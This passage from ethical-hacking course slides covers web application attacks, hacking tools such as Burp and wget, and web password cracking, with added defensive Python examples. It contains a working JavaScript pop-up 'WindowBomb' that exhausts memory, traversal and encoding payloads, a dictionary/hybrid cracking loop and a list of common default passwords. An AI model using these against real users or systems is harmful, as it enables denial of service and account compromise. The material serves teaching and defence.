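    print("other IP:", verify_cookie(c, "10.0.0.9"))
```

Binding to the client IP, as the slides recommend, does break legitimate sessions for users behind rotating proxies or mobile networks; a deployment that cannot accept that keeps the signature and the timeout and drops the address check.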
Authentication Hijacking

© Authentication prompts a user to supply the credentials that allow access to the application

© It can be accomplished through

• Basic authentication

• Strong authentication methods

© Web applications authenticate in varying methods

© Enforcing a consistent authentication policy between multiple and disparate applications can prove to be a real challenge

© A security lapse can lead to theft of service, session hijacking, and user impersonation
[Screenshot: .NET Passport Sign-in form. Recoverable text:]

.NET Passport Sign-in
E-mail Address: name@hotmail.com
Password:
[ ] Sign me in automatically.
[Sign In]
[ ] Do not remember my e-mail address for future sign-in. (Select this when using a public computer.)
Don't have a .NET Passport? Get one now.
Member Services | Terms of Use | Privacy Statement
Some elements © 1999 - 2004 Microsoft® Corporation. All rights reserved.
Countermeasures

© Use authentication methods that use secure channels wherever possible

© Instant SSL can be configured easily to encrypt all traffic between the client and the application

© Use cookies in a secure manner where possible
Log Tampering

© Logs are kept to track the usage patterns of the application

© Log tampering allows an attacker to cover their tracks or alter web transaction records

© Attacker strives to delete logs, modify logs, change user information, and otherwise destroy evidence of any attack

© Countermeasure

• Digitally signed and stamped logs

• Separate logs for system events

• Transaction log for all application events
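"Digitally signed and stamped logs" can be implemented without a PKI by chaining an HMAC through the records. The following is an added example, not part of the EC-Council courseware: each transaction record is stamped with an HMAC over its own content and the previous record's stamp, so deleting, editing or reordering a line breaks the chain at that point and a verifier can say where. The signing key and the transaction records are constructed.

```python
"""Tamper-evident application log via an HMAC hash chain.
Added example; the key and the transaction records are constructed."""
import hashlib
import hmac
import json

LOG_KEY = b"constructed-log-signing-key"   # constructed; keep it off the web server
GENESIS = "0" * 64                          # stamp "before" the first record


def stamp_for(prev_stamp, record):
    """HMAC-SHA256 over the previous stamp and the canonical JSON of this record."""
    msg = (prev_stamp + "|" + json.dumps(record, sort_keys=True)).encode()
    return hmac.new(LOG_KEY, msg, hashlib.sha256).hexdigest()


def append(log, record):
    """Append a record to `log` (a list of {"rec": ..., "stamp": ...}) and
    return the log.  The stamp depends on everything written before it."""
    prev = log[-1]["stamp"] if log else GENESIS
    log.append({"rec": record, "stamp": stamp_for(prev, record)})
    return log


def verify(log):
    """Return the index of the first record whose stamp does not fit the
    chain, or -1 if the chain is intact from the genesis stamp onward."""
    prev = GENESIS
    for i, entry in enumerate(log):
        if not hmac.compare_digest(entry["stamp"], stamp_for(prev, entry["rec"])):
            return i
        prev = entry["stamp"]
    return -1


def sample_log():
    """Constructed transaction log of three events."""
    log = []
    for rec in [
        {"ts": "2005-05-17T14:23:00", "user": "alice", "action": "login", "ok": True},
        {"ts": "2005-05-17T14:24:10", "user": "alice", "action": "transfer", "amount": 50},
        {"ts": "2005-05-17T14:25:31", "user": "mallory", "action": "login", "ok": False},
    ]:
        append(log, rec)
    return log


if __name__ == "__main__":
    log = sample_log()
    print("intact:", verify(log))            # -1
    log[1]["rec"]["amount"] = 5000           # an attacker edits a record
    print("after edit, first bad index:", verify(log))   # 1
```

One caveat the chain alone does not cover: truncating the newest records leaves a valid shorter chain. Writing the latest stamp periodically to a separate, append-only store (or a remote log host) closes that gap, which is also why the slide separates system-event logs from the application's transaction log.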
[Screenshot: SpyAgent AIM log viewer listing entries timestamped Tue 6/05/01 between 4:57:07 PM and 5:35:34 PM; status bar: Messages Logged: (count illegible).]

Picture Source:

http://www.computer-monitoring.com/images/spy-agent/aimlogss.gif
Error Message Interception

© Information in error messages is often rich with site-specific information that can be used for

• Determining the technologies used in the web applications

• Determining whether the attack attempt was successful

• Receiving hints for attack methods to try next

© Countermeasure

• Website cloaking capabilities make enterprise web resources invisible to hackers
Attack Obfuscation

© Attackers often work hard to mask and otherwise hide their attacks to avoid detection

© Most common method of attack obfuscation involves encoding portions of the attack with Unicode, UTF-8, or URL encoding

© Multiple levels of encoding can be used to further bury the attack

© Used for theft of service, account hijacking, information disclosure, Website defacement, etc.

© Countermeasure

• Thorough inspection of all traffic

• Block or translate Unicode and UTF-8 encoding to detect attacks
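"Translate the encoding, then inspect" is also what a URLScan-style request filter (see the IIS countermeasures slide earlier in this module) has to do before any rule can match. The following is an added example, not part of the EC-Council courseware and not URLScan's logic: it percent-decodes a request path repeatedly until it stops changing, counts the layers, flags overlong or invalid UTF-8 byte sequences, and only then looks for traversal and non-ASCII characters in the canonical form. The request paths are constructed sample data.

```python
"""Canonicalise an obfuscated request path before applying filter rules.
Added example; the request paths are constructed."""
import urllib.parse


def decode_layers(path, max_rounds=3):
    """Percent-decode until the string stops changing (bounded).  Returns
    (canonical_path, rounds); more than one round means the request was
    double-encoded, which is itself worth flagging."""
    rounds, current = 0, path
    while rounds < max_rounds:
        nxt = urllib.parse.unquote(current)
        if nxt == current:
            break
        current, rounds = nxt, rounds + 1
    return current, rounds


def has_invalid_utf8(raw_bytes):
    """True for overlong or otherwise invalid UTF-8.  Python's decoder is
    strict, so an overlong encoding of '/' or '.' raises instead of being
    silently mapped to ASCII the way lenient historical decoders did."""
    try:
        raw_bytes.decode("utf-8")
        return False
    except UnicodeDecodeError:
        return True


def inspect_request(path):
    """Return the list of reasons to block the request (empty list = pass)."""
    reasons = []
    if has_invalid_utf8(urllib.parse.unquote_to_bytes(path)):
        reasons.append("overlong/invalid UTF-8 sequence")
    canonical, rounds = decode_layers(path)
    if rounds > 1:
        reasons.append("multiple encoding layers")
    if ".." in canonical.replace("\\", "/"):
        reasons.append("directory traversal after decoding")
    if any(ord(ch) > 127 for ch in canonical):
        reasons.append("non-ASCII characters in path")
    return reasons


if __name__ == "__main__":
    for p in ["/scripts/index.asp", "/scripts/..%2f..%2fwinnt/system32",
              "/scripts/%252e%252e/", "/scripts/..%c0%af../"]:
        print(p, "->", inspect_request(p) or "pass")
```

Decoding is bounded on purpose: an unbounded loop over attacker-controlled input is a denial-of-service handle, and a path still carrying percent sequences after the third round is abnormal enough to block outright.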
Platform Exploits

© Web applications are built upon application platforms, such as BEA Weblogic, ColdFusion, IBM WebSphere, Microsoft .NET, and Sun JAVA technologies, etc.

© Vulnerabilities include the misconfiguration of the application, bugs, insecure internal routines, hidden processes and commands, and third-party enhancements

© The exploit of application platform vulnerabilities can allow:

• Access to developer areas

• The ability to update application and site content
DMZ Protocol Attacks

© DMZ (Demilitarized Zone) is a semi-trusted network zone that separates the untrusted Internet from the company's trusted internal network

© Most companies limit the protocols allowed to flow through their DMZ

© An attacker who is able to compromise a system that allows other DMZ protocols often has access to other DMZ and internal systems. This level of access can lead to:

• Compromise of the web application and data

• Defacement of Websites

• Access to internal systems, including databases, backups, and source code
DMZ

[Diagram: a firewall (hardware or software) separates the Internet from the DMZ network, which hosts the public-facing server; a second firewall (hardware or software) separates the DMZ from the LAN, which holds an internal server and workstations.]
Countermeasures

© Deploy a robust security policy

© Have a sound auditing policy

© The use of signatures to detect and block well-known attacks

• Signatures must be available for all forms of attack, and must be continually updated
Security Management Exploits

© Security management systems are targeted in order to turn off security enforcement

© An exploit of security management can lead to the modification of the protection policies

© Countermeasures

• There should be a single consolidated way to manage security that is specific to each application

• Use of firewalls
Web Services Attacks

© Web services allow process-to-process communication between web applications

© An attacker can inject a malicious script into a web service that will enable disclosure and modification of data

© Countermeasures

• Turn off web services not required for regular operations

• Provision for multiple layers of protection

• Block all known attack paths without relying on signature databases alone
Zero Day Attacks

© Zero-day attacks take place between the time a vulnerability is discovered by a researcher or attacker, and the time that the vendor issues a corrective patch

© Most zero-day attacks are only available as hand-crafted exploit code, but zero-day worms have caused rapid panic

© Zero-day vulnerability is the launching point for further exploitation of the web application and environment

© Countermeasures

• No security solution can claim that it will totally protect against all zero-day attacks

• Enforce stringent security policies

• Deploy a firewall and enable heuristic scanning (heuristics: common-sense rules drawn from experience to solve problems)
Network Access Attacks

• All traffic to and from a web application traverses networks
• These attacks use techniques like spoofing, bridging, ACL bypass, and stack attacks
• Sniffing network traffic will allow viewing of application commands, authentication information, and application data as it traverses the network
• Countermeasures
  • Shut down unnecessary services and therefore unnecessary listening ports
  • Define firewall rules to pass only legitimate traffic
TCP Fragmentation

• Every message that is transferred between computers by a data network is broken down into packets.
• Often packets are limited to a pre-determined size for interoperability with physical networks.
• An attack directly against a web server would specify that the "Push" flag is set, which would force every packet into the web server's memory. In this way, an attack would be delivered piece by piece, without the ability to detect the attack.
• Countermeasure
  • Use of packet filtering devices and firewall rules to thoroughly inspect the nature of traffic directed at a web server
Scenario

George found out that the Session IDs in Brett's Website are stored in a cookie to keep track of the user's state. If the users are made to click upon a link, then they can be redirected to a different site wherein their credentials can easily be stolen. George sends a URL link with a malicious code to Brett via Email. Brett clicks the page.

1. Can George force Brett to take actions on his behalf by browser exploitation?
2. Can he use the XSS vulnerable site's large user base to chew up a smaller site's bandwidth?
3. What would be the implications of George's action?
4. What countermeasures should Brett take in order to prevent such theft of information?
[Diagram: George sends a URL (with a malicious script) link to Brett via Email; Brett follows it, and the web server returns the requested page (with embedded malicious script) to Brett]
Hacking Tools

• Instant Source
• Wget
• WebSleuth
• BlackWidow
• WindowBomb
• Burp
• cURL
Instant Source

• http://www.blazingtool.com
• This tool allows you to see and edit the HTML source code of web pages
• It can be executed from Internet Explorer, wherein a new toolbar window displays the source code for any selected part of the page in the browser window
Hacking Tool: Wget

• www.gnu.org/software/wget/wget.html
• Wget is a command line tool for Windows and Unix that will download the contents of a Website
• It works non-interactively, in the background, after the user has logged off
• Wget works particularly well with slow or unstable connections by continuing to retrieve a document until the document is fully downloaded
• Both http and ftp retrievals can be time-stamped, so Wget can see if the remote file has changed since the last retrieval and automatically retrieve the new version if it has
Wget

[Screenshot: a Wget frontend window (File, Item, Options, Help menus) with a drag/drop area for the active URL; columns URL / Status / Time show http://www.rob.cybercomm.nl/index.html, Initialized, and the start time; a "Timer: Disabled" indicator shows whether the timer is active; the command that is passed to wget reads: wget -t 0 -nc -r -l 1 -R [illegible] -P c:\temp http://www.rob.cybercomm.nl/index.html]
Hacking Tool: WebSleuth

[Screenshot: the WebSleuth interface with Browser, Source, Intercept, Spider, Options, Notes, Properties, Toolbox, Plugins and Favorites panels, showing about:blank and "No Links In Document"]

WebSleuth is a tool that combines spidering with the capability of a personal proxy such as Achilles.

Picture Source: http://sandsprite.com/sleuth/
BlackWidow

• http://softbytelabs.com
• BlackWidow is a Website scanner, a site mapping tool, a site ripper, a site mirroring tool, and an offline browser program
• It can be used to scan a site and create a complete profile of the site's structure, files, Email addresses, external links, and even link errors
BlackWidow

[Screenshot: BlackWidow (Edit, Settings, View, List, Help menus) scanning Site URL http://iuggyboy.com/, with Browser, Structure, Emails, Ext Links, Link Errors and Threads tabs; the Emails tab lists the harvested addresses together with the page each was found on]
AccessDiver

• AccessDiver is a software which can detect security failures on web pages.
• It has multiple efficient tools which will verify the robustness of your accounts and directories accurately.

[Screenshot: AccessDiver with Proxy Analyzer, Directory failures, Exploiter and SOCKS server Analyzer tabs; the Exploiter list shows numbered CGI paths checked on the target (e.g. /cgi/handler, /cgi/webgais, /cgi/faxsurvey, /cgi/perl.exe, /cgi/wwwboard.pl, /cgi/view-source) and a "Path to access: Root / Local" setting]
Hacking Tool: WindowBomb

<HTML>
<HEAD>
<TITLE>WARNING [] INFECTING VIRUS</TITLE>
</HEAD>
<BODY onLoad="WindowBomb()">
<SCRIPT LANGUAGE="JavaScript">
function WindowBomb() {
  var counter = 0;  // dummy counter
  while (true) {
    // every pass opens one more 1x1 window; the loop never ends
    window.open("http://www.netscape.com",
                "CRUSHING" + counter,
                "width=1,height=1,resizable=no");
    counter++;
  }
}
</SCRIPT>
</BODY>
</HTML>

An Email sent with this HTML code attached will create pop-up windows until the PC's memory gets exhausted. JavaScript is vulnerable to simple coding such as this.
Burp: Positioning Payloads

http://portswigger.net

[Screenshot: burp intruder with target, positions, payloads, headers, timing, results and grep tabs, attack type "sniper"; the positions tab shows a POST /cgi-bin/register.pl HTTP/1.0 request to Host: www.app-target.com whose form fields (name, sex, age, occupation, education, email, password, password2, Register) are each marked as a payload position with § markers; buttons add, clear, auto, refresh; length: 333]

Burp is a tool for performing automated attacks against web-enabled applications.
Burp: Configuring Payloads and Content Enumeration

[Screenshot: burp intruder payloads tab (items processed, total payloads, total requests) with payload sources: preset list, runtime file, custom iterator, brute forcer, character substitution, case substitution, illegal Unicode, character blocks, numbers; buttons add, add from list, load, delete, clear]

Burp comes preconfigured with attack payloads and it can check for common databases on a Lotus Domino server.

[Screenshot: burp results table (request, payload, response, length, grep column "not authorized") for Domino database names such as names.nsf, log.nsf, catalog.nsf, domlog.nsf, domcfg.nsf, admin4.nsf and certlog.nsf; most return HTTP/1.1 200 OK, some HTTP/1.1 404 Not Found; progress: 100%]
Burp

[Screenshot: burp results for a content-discovery run (requests 7092 onwards, payloads favella, favisms, favored, ...), with response, error, timeout, length and grep "login incorrect" columns; every payload returns HTTP/1.0 200 OK with length 3733 except one HTTP/1.0 302 response of length 757; progress: 18%]

[Screenshot: burp results for a password-guessing run with two payload positions (name="username" and name="password"); requests that returned HTTP/1.0 200 Ok with lengths around 1610 correspond to valid username/password pairs, while HTTP/1.0 404 Not found responses of length 195 mark failed guesses; progress: 100%]

Burp can be used for password guessing as well as data mining.
Burp Proxy: Intercepting HTTP/S traffic

[Screenshot: burp proxy v1.0 with intercept, options, history and alerts tabs, forward and drop buttons and a text/hex view selector, showing "Request to https://online.lloydstsb.co.uk:443":]

GET /customer.ibc HTTP/1.1
Host: online.lloydstsb.co.uk
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021204
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1
Accept-Language: en-us, en;q=0.50
Accept-Encoding: gzip, deflate, compress;q=0.9
Accept-Charset: ISO-8859-1, utf-8;q=0.66, *;q=0.66
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.lloydstsb.co.uk/

Burp proxy operates as a man-in-the-middle between the end browser and the target web server, and allows the attacker to intercept, inspect, and modify the raw traffic passing in both directions.
Burp Proxy: Hex-editing of Intercepted Traffic

[Screenshot: burp proxy v1.0 intercept tab, "Request to http://login.passport.net:80", in hex view: the bytes of the GET request (Host: login.passport.net, User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20021204, Accept: text/xml,application/xml,...) shown as offset, hex columns and ASCII, with a context menu offering Insert byte, Insert bytes..., Insert string... and Delete byte]

Burp proxy allows the attacker to modify intercepted traffic in both text and hexadecimal form, so even transfers of binary data can be manipulated.
Burp Proxy: Browser Request History

[Screenshot: Mozilla browser at http://burp/ showing "burp proxy v1.0 by PortSwigger" with a "clear cache" link and a table of target, method, URL and modified? columns, listing GET and POST requests to www.hotmail.com:80, loginnet.passport.com:80 (/login.srf?...), login.passport.net:80 (/uilogin.srf?...), cb.msn.com:80 (/passport/cbhm.js.ashx?...) and https://login.passport.com:443 (/ppsecure/post.srf?...), one of them flagged as modified]

Burp proxy maintains a complete history of every request sent by the browser.
Hacking Tool: cURL

http://curl.haxx.se

• cURL is a multi-protocol transfer library
• It is a client side URL transfer library supporting FTP, FTPS, HTTP, HTTPS, GOPHER, TELNET, DICT, FILE, and LDAP
• cURL supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading, Kerberos, HTTP form-based upload, proxies, cookies, user+password authentication, file transfer resume, http proxy tunneling, and more

Copyright © by EC-Council
Screenshot: cURL

curl 7.10 (win32) libcurl/7.10
Usage: curl [options...] <url>
Options: (H) means HTTP/HTTPS only, (F) means FTP only
 -a/--append                 Append to target file when uploading (F)
 -A/--user-agent <string>    User-Agent to send to server (H)
 -b/--cookie <name=string/file>  Cookie string or file to read cookies from (H)
 -B/--use-ascii              Use ASCII/text transfer
 -c/--cookie-jar <file>      Write all cookies to this file after operation (H)
 -C/--continue-at <offset>   Specify absolute resume offset
 -d/--data <data>            HTTP POST data (H)
    --data-ascii <data>      HTTP POST ASCII data (H)
    --data-binary <data>     HTTP POST binary data (H)
    --disable-epsv           Prevents curl from using EPSV (F)
 -D/--dump-header <file>     Write the headers to this file
    --egd-file <file>        EGD socket path for random data (SSL)
 -e/--referer                Referer page (H)
 -E/--cert <cert[:passwd]>   Specifies your certificate file and password (HTTPS)
    --cert-type <type>       Specifies certificate file type (DER/PEM/ENG) (HTTPS)
    --key <key>              Specifies private key file (HTTPS)
    --key-type <type>        Specifies private key file type (DER/PEM/ENG) (HTTPS)
    --pass <pass>            Specifies passphrase for the private key (HTTPS)
    --engine <eng>           Specifies the crypto engine to use (HTTPS)
    --cacert <file>          CA certificate to verify peer against (SSL)
    --capath <directory>     CA directory (made using c_rehash) to verify peer against (SSL, NOT Windows)
    --ciphers <list>         What SSL ciphers to use (SSL)
    --compressed             Request a compressed response (using deflate).
    --connect-timeout <seconds>  Maximum time allowed for connection
    --crlf                   Convert LF to CRLF in upload. Useful for MVS (OS/390)
 -f/--fail                   Fail silently (no output at all) on errors (H)
 -F/--form <name=content>    Specify HTTP POST data (H)
 -g/--globoff                Disable URL sequences and ranges using {} and []
 -G/--get                    Send the -d data with a HTTP GET (H)
 -h/--help                   This help text
 -H/--header <line>          Custom header to pass to server. (H)
 -i/--include                Include the HTTP-header in the output (H)
 -I/--head                   Fetch document info only (HTTP HEAD/FTP SIZE)
 -j/--junk-session-cookies   Ignore session cookies read from file (H)
    --interface <interface>  Specify the interface to be used
Carnivore

• Carnivore is an FBI assistance program
• It captures all Email messages to and from a specific user's account
• Carnivore eavesdrops on network packets, watching them go by, then saves a copy of the packets it is interested in (passive sniffer)
[Screenshot: Carnivore "Filter Set" configuration dialog]

Picture Source: http://www.politrix.org/foia/carnivore/carnr03.jpg
Summary

• Web applications are client/server software applications that interact with users or other systems using HTTP
• Attackers may try to deface the Website, steal credit card information, inject malicious codes, exploit server side scripting, etc.
• Command injection, XSS attacks, SQL Injection, Cookie Snooping, cryptographic Interception, Buffer Overflow, etc. are some of the threats against web applications
• Organization policies must support the countermeasures against all such types of attacks
Ethical Hacking

Module XIII

Web-Based Password Cracking Techniques

Scenario

Cracking accounts, stealing files, defacing websites is just a click away for Raven. All of these illegal activities give him a kick. He uses his skills to make money for his living. He has a website where people can request him to do all manner of things such as cracking email accounts, enumerating accounts and lots more; whatever the requester wants to get from any website. All of this is done only after the payment is made and he charges a minimal amount. Raven is a hit among the underground community.

However, the users have to give their email IDs to get the information on his online request form.

Raven's first encounter with cracking was just after he had graduated, but was unemployed. He had read about cracking techniques on the net and about crackers who offer services for money. This catch lured Raven to be a cracker. His first victim was his friend's email account.

He used a brute force attack when the dictionary attack failed. After a few attempts, Raven was successful in cracking his friend's password. Thus, Raven's journey of illegal activities began.

How far can he go?

What if he masters other activities such as generating malicious codes to disrupt systems on the net or cracking the passwords of Government agencies?
Module Objectives

• Authentication - Definition
• Authentication Mechanisms
• What is a Password Cracker?
• Modus Operandi of an Attacker Using Password Cracker
• How does a Password Cracker work?
• Attacks - Classification
• Password Cracking Tools
• Countermeasures
Module Flow

[Diagram: Understanding Session Hijacking -> Spoofing vs. Hijacking -> TCP 3-Way Handshake -> Session Hijacking Tools]
Authentication - Definition

• Authentication is the process of determining the user's identity
• In private and public computer networks, authentication is commonly done through the use of login IDs and passwords
• Knowledge of the password is assumed to guarantee that the user is authentic
• Passwords can often be stolen, accidentally revealed, or forgotten due to inherent loopholes in this type of authentication
Authentication Mechanisms

• HTTP Authentication
  • Basic Authentication
  • Digest Authentication
• Integrated Windows (NTLM) Authentication
• Negotiate Authentication
• Certificate-Based Authentication
• Forms-Based Authentication
• Microsoft Passport Authentication
HTTP Authentication

• There are two techniques for HTTP authentication. They are:
  • Basic
  • Digest
Basic Authentication

• It is the most basic form of authentication available to web applications
• It begins with a client making a request to the web server for a protected resource, without any authentication credentials
• The limitation of this protocol is that it is wide open to eavesdropping attacks
• The use of 128-bit SSL encryption can thwart these attacks

[Screenshot: "Enter Network Password" dialog: "Please type your user name and password." Site: www.regsoft.net, Realm: RegSoft.com Vendor Area, User Name: myuserid, Password field, "Save this password in your password list" checkbox, OK and Cancel buttons]

Picture Source: http://www.roboform.com/pics/basicauth.gif
Digest Authentication

• It is designed to provide a higher level of security vis-a-vis Basic authentication
• It is based on the challenge-response authentication model
• It is a significant improvement over Basic authentication as it does not send the user's cleartext password over the network
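To make the difference between the Basic and Digest slides concrete, here is an added example (not part of the courseware) that builds both Authorization headers and shows what an eavesdropper recovers from each. The Digest computation follows RFC 2617 without the qop directive; the realm, nonce and credentials are constructed sample values.

```python
"""Added example (not part of the courseware): what crosses the wire under
HTTP Basic versus HTTP Digest authentication. Digest follows RFC 2617 without
the qop directive. The realm, nonce and credentials are constructed values.
"""
import base64
import hashlib


def basic_authorization(username: str, password: str) -> str:
    """Basic: the client sends base64(user:password). Base64 is an encoding,
    not encryption, so anyone who captures the header gets the password."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return f"Authorization: Basic {token}"


def sniff_basic(header_line: str) -> str:
    """What a sniffer does with a captured Basic header: decode it."""
    token = header_line.split(" ", 2)[2]
    return base64.b64decode(token).decode()


def _md5(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def digest_ha1(username: str, realm: str, password: str) -> str:
    """HA1 = MD5(user:realm:password). A server may store HA1 instead of the
    cleartext password; it is enough to verify responses."""
    return _md5(f"{username}:{realm}:{password}")


def digest_response(ha1: str, method: str, uri: str, nonce: str) -> str:
    """response = MD5(HA1:nonce:HA2) where HA2 = MD5(method:uri).
    The password enters only through HA1, so it never appears on the wire,
    and the server-chosen nonce ties the response to this challenge."""
    ha2 = _md5(f"{method}:{uri}")
    return _md5(f"{ha1}:{nonce}:{ha2}")


def digest_authorization(username, realm, password, method, uri, nonce) -> str:
    """The client's Authorization header answering a Digest challenge."""
    resp = digest_response(digest_ha1(username, realm, password), method, uri, nonce)
    return (f'Authorization: Digest username="{username}", realm="{realm}", '
            f'nonce="{nonce}", uri="{uri}", response="{resp}"')


def server_verify_digest(stored_ha1, method, uri, nonce, header_line) -> bool:
    """Server side: recompute the expected response from the stored HA1 and
    the nonce it issued, and compare it with the response field sent."""
    fields = dict(
        part.strip().split("=", 1)
        for part in header_line.split(" ", 2)[2].split(", ")
    )
    client_resp = fields["response"].strip('"')
    return digest_response(stored_ha1, method, uri, nonce) == client_resp


def demo() -> dict:
    """Run both schemes for the same constructed credentials."""
    user, pw = "myuserid", "Vendor-Area-7"          # constructed credentials
    realm, nonce = "RegSoft.com Vendor Area", "c0nstructed-n0nce-0001"
    basic = basic_authorization(user, pw)
    digest = digest_authorization(user, realm, pw, "GET", "/vendor/", nonce)
    return {
        "basic_header": basic,
        "sniffed_from_basic": sniff_basic(basic),        # the password, in clear
        "digest_header": digest,
        "password_visible_in_digest": pw in digest,      # False
        "server_accepts": server_verify_digest(
            digest_ha1(user, realm, pw), "GET", "/vendor/", nonce, digest),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Note that Digest still relies on MD5 and protects only the password, not the rest of the exchange, which is why the slide's SSL recommendation applies to both schemes.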
[Screenshot: ISA Server "Add/Edit Listeners" dialog for Server: FAST ISA SERVER with IP Address, Display Name, "Use a server certificate to authenticate to web clients" (Select...), and Authentication options: Basic with this domain (Select domain...), Digest with this domain (Select domain...), Integrated, Client certificate (secure channel only); OK and Cancel]
Integrated Windows Authentication

• It uses Microsoft's proprietary NT LAN Manager (NTLM) authentication program over HTTP
• It only works with Microsoft's Internet Explorer browser and IIS web servers
• Integrated Windows authentication is more suitable for intranet deployment
• In this type of authentication, no version of the user's password ever crosses the wire
[Screenshot: IIS "Authentication Methods" dialog: Anonymous access ("No user name/password required to access this resource"; account used for anonymous access: User name IUSR_ECCOUNCIL, Password, "Allow IIS to control password"); Authenticated access ("For the following authentication methods, user name and password are required when anonymous access is disabled, or access is restricted using NTFS access control lists"): "Digest authentication for Windows domain servers", "Basic authentication (password is sent in clear text)", Default domain: Select...]
Negotiate Authentication

• It is an extension of NTLM authentication
• It provides Kerberos-based authentication
• It uses a negotiation process to decide on the level of security to be used
• This configuration is fairly restrictive and uncommon except on corporate intranets
Certificate-Based Authentication

• It uses public key cryptography and a digital certificate to authenticate a user.
• It is considered an implementation of two-factor authentication. In addition to something a user knows (password), he must authenticate with a certificate.
• It is possible to trick the user into accepting a spoofed certificate or a fake certificate.
• Very few hacking tools currently support client certificates.

[Screenshot: Windows "Certificate" dialog (General, Details, Certification Path tabs): "This certificate is intended for the following purpose(s): Ensures software came from software publisher; Protects software from alteration after publication; Windows Hardware Driver Verification". Issued to: Microsoft Windows Hardware Compatibility. Issued by: Microsoft Root Authority. Valid from 10/1/1997 to 12/31/2002. Issuer Statement, OK]
Forms-Based Authentication

[Screenshot: "gw-paris : User Authentication Rule Properties" dialog with User Authentication Rule, Radius Options, Agent Options, Log Settings and Restrictions tabs; General section: Login Type: FORM, Realm String, HTML Directory. "The HTML Directory is used in order to customize the pages, which are presented to the user at authentication time. Leave this blank in order to use the default pages. The HTML root directory is specified in the Firewall properties options tab." OK, Cancel, Apply]

• It does not rely on features supported by the basic web protocols like HTTP and SSL
• It is a highly customizable authentication mechanism that uses a form, usually composed of HTML
• It is the most popular authentication technique deployed on the Internet
Microsoft Passport Authentication

• Single sign-on is the term used to represent a system whereby users need only remember one user name and password, and be authenticated for multiple services
• Passport was Microsoft's universal single sign-in (SSI) platform
• It enabled the use of one set of credentials to access any Passport enabled site such as MSN, Hotmail, and MSN Messenger
• Microsoft encouraged third-party companies to use Passport as a universal authentication platform
[Screenshot: ".NET Passport Sign-in" dialog with E-mail Address and Password fields, a "Sign me in automatically" checkbox, a Sign In button, "Do not remember my e-mail address for future sign-in. (Select this when using a public computer.)" and "Don't have a .NET Passport? Get one now."]
What Is A Password Cracker?

• According to the Maximum Security definition, "A password cracker is any program that can decrypt passwords or otherwise disable password protection"
• Password crackers use two primary methods to identify correct passwords: brute-force and dictionary searches
• A password cracker may also be able to identify encrypted passwords. After retrieving the password from the computer's memory, the program may be able to decrypt it
Modus Operandi of an Attacker Using Password Cracker

• The aim of a password cracker is mostly to obtain the root/administrator password of the target system
• The administrator right gives the attacker access to files and applications, and he can install a backdoor such as a trojan for future access to the system
• The attacker can also install a network sniffer to sniff the internal network traffic so that he will have most of the information passed around the network
• After gaining root access, the attacker escalates privileges to that of the administrator
• In order to crack passwords efficiently, the attacker should use a system which has greater computing power
How Does A Password Cracker Work?

• To understand how a password cracker works, it is better to understand the working of a password generator. Most of them use some form of cryptography.
• Crypto stems from the Greek word kryptos. Kryptos was used to describe anything that was hidden, obscured, veiled, secret, or mysterious. Graph is derived from graphia, which means writing.
How Does A Password Cracker Work? 2.

• Cryptography is concerned with the ways in which communications and data can be encoded to prevent disclosure of their contents through eavesdropping or message interception, using codes, ciphers, and other methods, so that only certain people can see the real message.
• Distributed cracking is where the cracker runs the cracking program in parallel, on separate processors. There are a few ways to do this. One is to break the password file into pieces and crack those pieces on separate machines.
How Does A Password Cracker Work? - 3

© The wordlist is sent through the encryption process, generally one word at a time. Rules are applied to the word and, after each such application, the word is again compared to the target password (which is also encrypted). If no match occurs, the next word is sent through the process.

© In the final stage, if a match occurs, the password is then deemed cracked. The plain-text word is then piped to a file.

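The loop just described, as an added example that is not part of the courseware: a small password audit that hashes each wordlist entry (with hybrid-style mangling rules) and compares it against stored digests. The hash scheme, the user names, the wordlist and the stored passwords are all constructed for this example.

```python
"""Dictionary/hybrid password audit (added example, constructed data)."""
import hashlib
import itertools
from typing import Iterable, Iterator, Optional


def store(password: str, salt: str) -> str:
    """The 'encryption process' of the slide: here a salted SHA-256 digest."""
    return hashlib.sha256((salt + password).encode()).hexdigest()


# Constructed password file: user -> (salt, digest). The first two passwords
# are dictionary words with digits appended; the third is passphrase-derived.
STORED = {
    "dana":  ("s1", store("Dana99", "s1")),
    "sue":   ("s2", store("monkeys1", "s2")),
    "admin": ("s3", store("Mh@l!t!hWf", "s3")),
}

WORDLIST = ["password", "dana", "monkeys", "letmein", "starwars"]  # constructed


def rules(word: str) -> Iterator[str]:
    """Mangling rules applied to each word: case variants plus one or two
    appended digits (the same idea as a cracker's 'characters to append')."""
    for base in (word, word.capitalize(), word.upper()):
        yield base
        for n in range(1, 3):
            for digits in itertools.product("0123456789", repeat=n):
                yield base + "".join(digits)


def crack(salt: str, target: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the plaintext if some word/rule candidate hashes to target."""
    for word in wordlist:
        for candidate in rules(word):
            if store(candidate, salt) == target:
                return candidate
    return None


def audit(stored=STORED, wordlist=WORDLIST) -> dict:
    """Map each user to the recovered password, or None if nothing matched."""
    return {user: crack(salt, digest, wordlist)
            for user, (salt, digest) in stored.items()}


if __name__ == "__main__":
    for user, found in audit().items():
        print(f"{user}: {'WEAK: ' + found if found else 'not found by wordlist/rules'}")
```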
Attacks - Classification

© The various types of attacks that are performed by the hacker to crack a password are as follows:

• Dictionary attack

• Hybrid attack

• Brute force attack

Password Guessing

© Password guessing attacks can be carried out manually or via automated tools

© Doing social engineering on the victim may also sometimes reveal passwords

© Password guessing can be performed against all types of web authentication

The common passwords used are: root, administrator, admin, operator, demo, test, webmaster, backup, guest, trial, member, private, beta, [company_name] or [known_username]

Password Guessing (contd.)

© Most of the users assign passwords that are related to their personal life such as father's middle name, as shown in the screenshot

© An attacker can easily fill out the form for forgotten passwords and retrieve the same

© This is one of the simplest ways of password guessing

[Screenshot: Yahoo! Mail sign-up form ("Sign up for your Yahoo! ID with Mail"); the password-recovery section asks "Security Question: What is your father's middle name?" with "Your Answer: peter", next to the birthday and current e-mail fields]

Query String

© The query string is the extra bit of data in the URL after the question mark (?) that is used to pass variables
